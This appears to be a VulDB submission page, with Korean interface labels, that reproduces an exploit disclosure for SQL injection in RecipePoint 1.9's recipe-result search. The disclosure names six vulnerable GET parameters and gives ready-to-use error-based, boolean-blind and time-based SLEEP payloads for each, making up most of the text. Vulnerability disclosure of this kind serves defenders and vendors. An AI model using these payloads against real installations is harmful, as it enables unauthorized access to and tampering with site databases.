제출 #184282: RecipePoint 1.9 - SQL Injection정보

제목	RecipePoint 1.9 - SQL Injection
설명	# Exploit Title: RecipePoint 1.9 - SQL Injection # Exploit Author: skalvin aka (CraCkEr) # Date: 15/07/2023 # Vendor: phpscriptpoint # Vendor Homepage: https://phpscriptpoint.com/ # Software Link: https://demo.phpscriptpoint.com/recipepoint/ # Tested on: Windows 10 Pro # Impact: Database Access ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /recipepoint/recipe-result GET parameter 'text' is vulnerable to SQL Injection GET parameter 'category' is vulnerable to SQL Injection GET parameter 'type' is vulnerable to SQL Injection GET parameter 'difficulty' is vulnerable to SQL Injection GET parameter 'cuisine' is vulnerable to SQL Injection GET parameter 'cooking_method' is vulnerable to SQL Injection https://website/recipepoint/recipe-result?text=[SQLI]&category=[SQLI]&type=[SQLI]&difficulty=[SQLI]&cuisine=[SQLI]&cooking_method=[SQLI] --- Parameter: text (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: text=") AND (SELECT(0)FROM(SELECT COUNT(),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1 Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: text=") OR NOT 07033=7033-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1 Parameter: category (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: text=&category=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1 Parameter: type (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: text=&category=7&type=Free"XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR"Z&difficulty=Beginner&cuisine=2&cooking_method=1 Parameter: difficulty (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: text=&category=7&type=Free&difficulty=Beginner"XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR"Z&cuisine=2&cooking_method=1 Parameter: cuisine (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&cooking_method=1 Parameter: cooking_method (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=(SELECT(0)FROM(SELECT(SLEEP(5)))a) --- [-] Done
사용자	skalvin (UID 49463)
제출	2023. 07. 19. AM 12:03 (3 연령 ago)
모더레이션	2023. 07. 27. PM 09:42 (9 days later)
상태	수락
VulDB 항목	235605 [phpscriptpoint RecipePoint 1.9 /recipe-result SQL 주입]
포인트들	17

◂ 이전 개요 다음 ▸

Might our Artificial Intelligence support you?

Check our Alexa App!